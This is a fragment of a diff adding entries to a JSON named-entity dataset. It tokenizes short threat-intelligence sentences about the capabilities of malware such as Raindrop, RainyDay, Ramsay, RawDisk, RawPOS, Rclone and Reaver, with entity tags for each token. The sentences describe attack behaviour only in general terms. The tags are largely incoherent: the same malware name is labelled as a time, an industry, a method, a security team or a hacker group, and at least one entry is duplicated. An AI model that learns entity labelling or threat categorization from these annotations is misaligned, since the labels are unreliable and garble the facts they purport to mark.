"resembled", + "legitimate", + "Windows", + "file", + "and", + "directory", + "names." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Raindrop", + "used", + "a", + "custom", + "packer", + "for", + "its", + "Cobalt", + "Strike", + "payload,", + "which", + "was", + "compressed", + "using", + "the", + "LZMA", + "algorithm." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Raindrop", + "used", + "steganography", + "to", + "locate", + "the", + "start", + "of", + "its", + "encoded", + "payload", + "within", + "legitimate", + "7-Zip", + "code." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "initial", + "installation,", + "Raindrop", + "runs", + "a", + "computation", + "to", + "delay", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "use", + "tools", + "to", + "collect", + "credentials", + "from", + "web", + "browsers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "use", + "side-loading", + "to", + "run", + "malicious", + "executables." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "B-HackOrg", + "B-HackOrg" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "use", + "a", + "file", + "exfiltration", + "tool", + "to", + "collect", + "recently", + "changed", + "files", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "decrypt", + "its", + "payload", + "via", + "a", + "XOR", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "has", + "downloaded", + "as", + "a", + "XOR-encrypted", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "use", + "a", + "file", + "exfiltration", + "tool", + "to", + "upload", + "specific", + "files", + "to", + "Dropbox." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "RainyDay", + "has", + "the", + "ability", + "to", + "switch", + "between", + "TCP", + "and", + "HTTP", + "for", + "C2", + "if", + "one", + "method", + "is", + "not", + "working." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "has", + "the", + "ability", + "to", + "uninstall", + "itself", + "by", + "deleting", + "its", + "service", + "and", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "use", + "a", + "file", + "exfiltration", + "tool", + "to", + "collect", + "recently", + "changed", + "files", + "with", + "specific", + "extensions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "download", + "files", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "use", + "a", + "file", + "exfiltration", + "tool", + "to", + "copy", + "files", + "to", + "<code>C:\\ProgramData\\Adobe\\temp</code>", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "has", + "named", + "services", + "and", + "scheduled", + "tasks", + "to", + "appear", + "benign", + "including", + "\"ChromeCheck\"", + "and", + "\"googleupdate.\"" + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "RainyDay", + "has", + "used", + "names", + "to", + "mimic", + "legitimate", + "software", + "including", + "\"vmtoolsd.exe\"", + "to", + "spoof", + "Vmtools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "file", + "collection", + "tool", + "used", + "by", + "RainyDay", + "can", + "utilize", + "native", + "API", + "including", + "<code>ReadDirectoryChangeW</code>", + "for", + "folder", + "monitoring." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "use", + "TCP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "enumerate", + "processes", + "on", + "a", + "target", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "use", + "proxy", + "tools", + "including", + "boost_proxy_client", + "for", + "reverse", + "proxy", + "functionality." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "use", + "scheduled", + "tasks", + "to", + "achieve", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "has", + "the", + "ability", + "to", + "capture", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "use", + "RC4", + "to", + "encrypt", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "create", + "and", + "register", + "a", + "service", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "use", + "HTTP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "use", + "the", + "Windows", + "Command", + "Shell", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "use", + "the", + "QuarksPwDump", + "tool", + "to", + "obtain", + "local", + "passwords", + "and", + "domain", + "cached", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RainyDay", + "can", + "use", + "services", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "insert", + "itself", + "into", + "the", + "address", + "space", + "of", + "other", + "applications", + "using", + "the", + "AppInit", + "DLL", + "Registry", + "key." + ], + "ner_tags": [ + "B-Tool", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "store", + "collected", + "documents", + "in", + "a", + "custom", + "container", + "after", + "encrypting", + "and", + "compressing", + "them", + "using", + "RC4", + "and", + "WinRAR." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "compress", + "and", + "archive", + "collected", + "files", + "using", + "WinRAR." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "conduct", + "an", + "initial", + "scan", + "for", + "Microsoft", + "Word", + "documents", + "on", + "the", + "local", + "system,", + "removable", + "media,", + "and", + "connected", + "network", + "drives,", + "before", + "tagging", + "and", + "collecting", + "them.", + "It", + "can", + "continue", + "tagging", + "documents", + "to", + "collect", + "with", + "follow", + "up", + "scans." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "use", + "UACMe", + "for", + "privilege", + "escalation." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "use", + "the", + "Windows", + "COM", + "API", + "to", + "schedule", + "tasks", + "and", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "hijack", + "outdated", + "Windows", + "application", + "dependencies", + "with", + "malicious", + "versions", + "of", + "its", + "own", + "DLL", + "payload." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "collect", + "Microsoft", + "Word", + "documents", + "from", + "the", + "target's", + "file", + "system,", + "as", + "well", + "as", + "<code>.txt</code>,", + "<code>.doc</code>,", + "and", + "<code>.xls</code>", + "files", + "from", + "the", + "Internet", + "Explorer", + "cache." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "collect", + "data", + "from", + "network", + "drives", + "and", + "stage", + "it", + "for", + "exfiltration." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "collect", + "data", + "from", + "removable", + "media", + "and", + "stage", + "it", + "for", + "exfiltration." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "extract", + "its", + "agent", + "from", + "the", + "body", + "of", + "a", + "malicious", + "document." + ], + "ner_tags": [ + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "has", + "been", + "delivered", + "using", + "OLE", + "objects", + "in", + "malicious", + "documents." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "use", + "<code>ImprovedReflectiveDLLInjection</code>", + "to", + "deploy", + "components." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "has", + "been", + "embedded", + "in", + "documents", + "exploiting", + "CVE-2017-0199,", + "CVE-2017-11882,", + "and", + "CVE-2017-8570." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "collect", + "directory", + "and", + "file", + "lists." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "stage", + "data", + "prior", + "to", + "exfiltration", + "in", + "<code>%APPDATA%\\Microsoft\\UserSetting</code>", + "and", + "<code>%APPDATA%\\Microsoft\\UserSetting\\MediaCache</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Ramsay", + "has", + "been", + "executed", + "through", + "malicious", + "e-mail", + "attachments." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "has", + "masqueraded", + "as", + "a", + "JPG", + "image", + "file." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "has", + "masqueraded", + "as", + "a", + "7zip", + "installer." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "use", + "Windows", + "API", + "functions", + "such", + "as", + "<code>WriteFile</code>,", + "<code>CloseHandle</code>,", + "and", + "<code>GetCurrentHwProfile</code>", + "during", + "its", + "collection", + "and", + "file", + "storage", + "operations.", + "Ramsay", + "can", + "execute", + "its", + "embedded", + "components", + "via", + "<code>CreateProcessA</code>", + "and", + "<code>ShellExecute</code>." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "scan", + "for", + "systems", + "that", + "are", + "vulnerable", + "to", + "the", + "EternalBlue", + "exploit." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Exp" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "scan", + "for", + "network", + "drives", + "which", + "may", + "contain", + "documents", + "for", + "collection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "has", + "base64-encoded", + "its", + "portable", + "executable", + "and", + "hidden", + "itself", + "under", + "a", + "JPG", + "header.", + "Ramsay", + "can", + "also", + "embed", + "information", + "within", + "document", + "footers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "scan", + "for", + "removable", + "media", + "which", + "may", + "contain", + "documents", + "for", + "collection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "gather", + "a", + "list", + "of", + "running", + "processes", + "by", + "using", + "Tasklist." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Ramsay", + "has", + "created", + "Registry", + "Run", + "keys", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "spread", + "itself", + "by", + "infecting", + "other", + "portable", + "executable", + "files", + "on", + "removable", + "drives." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "has", + "included", + "a", + "rootkit", + "to", + "evade", + "defenses." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "schedule", + "tasks", + "via", + "the", + "Windows", + "COM", + "API", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "take", + "screenshots", + "every", + "30", + "seconds", + "as", + "well", + "as", + "when", + "an", + "external", + "removable", + "storage", + "device", + "is", + "connected." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "has", + "been", + "distributed", + "through", + "spearphishing", + "emails", + "with", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "has", + "used", + "base64", + "to", + "encode", + "its", + "C2", + "traffic." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "has", + "PE", + "data", + "embedded", + "within", + "JPEG", + "files", + "contained", + "within", + "Word", + "documents." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "detect", + "system", + "information--including", + "disk", + "names,", + "total", + "space,", + "and", + "remaining", + "space--to", + "create", + "a", + "hardware", + "profile", + "GUID", + "which", + "acts", + "as", + "a", + "system", + "identifier", + "for", + "operators." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "use", + "ipconfig", + "and", + "Arp", + "to", + "collect", + "network", + "configuration", + "information,", + "including", + "routing", + "information", + "and", + "ARP", + "tables." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "use", + "<code>netstat</code>", + "to", + "enumerate", + "network", + "connections." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "can", + "spread", + "itself", + "by", + "infecting", + "other", + "portable", + "executable", + "files", + "on", + "networks", + "shared", + "drives." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "has", + "included", + "embedded", + "Visual", + "Basic", + "scripts", + "in", + "malicious", + "documents." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ramsay", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "RawDisk", + "was", + "used", + "in", + "Shamoon", + "to", + "write", + "to", + "protected", + "system", + "locations", + "such", + "as", + "the", + "MBR", + "and", + "disk", + "partitions", + "in", + "an", + "effort", + "to", + "destroy", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "RawDisk", + "has", + "been", + "used", + "to", + "directly", + "access", + "the", + "hard", + "disk", + "to", + "help", + "overwrite", + "arbitrarily", + "sized", + "portions", + "of", + "disk", + "content." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RawDisk", + "was", + "used", + "in", + "Shamoon", + "to", + "help", + "overwrite", + "components", + "of", + "disk", + "structure", + "like", + "the", + "MBR", + "and", + "disk", + "partitions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-SamFile", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "RawPOS", + "encodes", + "credit", + "card", + "data", + "it", + "collected", + "from", + "the", + "victim", + "with", + "XOR." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RawPOS", + "dumps", + "memory", + "from", + "specific", + "processes", + "on", + "a", + "victim", + "system,", + "parses", + "the", + "dumped", + "files,", + "and", + "scrapes", + "them", + "for", + "credit", + "card", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Data", + "captured", + "by", + "RawPOS", + "is", + "placed", + "in", + "a", + "temporary", + "file", + "under", + "a", + "directory", + "named", + "\"memdump\"." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "New", + "services", + "created", + "by", + "RawPOS", + "are", + "made", + "to", + "appear", + "like", + "legitimate", + "Windows", + "services,", + "with", + "names", + "such", + "as", + "\"Windows", + "Management", + "Help", + "Service\",", + "\"Microsoft", + "Support\",", + "and", + "\"Windows", + "Advanced", + "Task", + "Manager\"." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Idus", + "I-Tool", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "RawPOS", + "installs", + "itself", + "as", + "a", + "service", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rclone", + "can", + "compress", + "files", + "using", + "`gzip`", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Rclone", + "\"chunker\"", + "overlay", + "supports", + "splitting", + "large", + "files", + "in", + "smaller", + "chunks", + "during", + "upload", + "to", + "circumvent", + "size", + "limits." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rclone", + "can", + "exfiltrate", + "data", + "over", + "SFTP", + "or", + "HTTPS", + "via", + "WebDAV." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Rclone", + "can", + "exfiltrate", + "data", + "over", + "FTP", + "or", + "HTTP,", + "including", + "HTTP", + "via", + "WebDAV." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Rclone", + "can", + "exfiltrate", + "data", + "to", + "cloud", + "storage", + "services", + "such", + "as", + "Dropbox,", + "Google", + "Drive,", + "Amazon", + "S3,", + "and", + "MEGA." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rclone", + "can", + "list", + "files", + "and", + "directories", + "with", + "the", + "`ls`,", + "`lsd`,", + "and", + "`lsl`", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reaver", + "encrypts", + "collected", + "data", + "with", + "an", + "incremental", + "XOR", + "key", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reaver", + "drops", + "and", + "executes", + "a", + "malicious", + "CPL", + "file", + "as", + "its", + "payload." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reaver", + "encrypts", + "some", + "of", + "its", + "files", + "with", + "XOR." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reaver", + "deletes", + "the", + "original", + "dropped", + "file", + "from", + "the", + "victim." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "Reaver", + "variants", + "use", + "raw", + "TCP", + "for", + "C2." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Reaver", + "queries", + "the", + "Registry", + "to", + "determine", + "the", + "correct", + "Startup", + "path", + "to", + "use", + "for", + "persistence." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reaver", + "creates", + "a", + "shortcut", + "file", + "and", + "saves", + "it", + "in", + "a", + "Startup", + "folder", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Time", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reaver", + "creates", + "a", + "shortcut", + "file", + "and", + "saves", + "it", + "in", + "a", + "Startup", + "folder", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Time", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reaver", + "collects", + "system", + "information", + "from", + "the", + "victim,", + "including", + "CPU", + "speed,", + "computer", + "name,", + "volume", + "serial", + "number,", + "ANSI", + "code", + "page,", + "OEM", + "code", + "page", + "identifier", + "for", + "the", + "OS,", + "Microsoft", + "Windows", + "version,", + "and", + "memory", + "information." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reaver", + "collects", + "the", + "victim's", + "IP", + "address." + ], + "ner_tags": [ + "B-Time", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Reaver", + "collects", + "the", + "victim's", + "username." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "Reaver", + "variants", + "use", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Reaver", + "installs", + "itself", + "as", + "a", + "new", + "service." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + 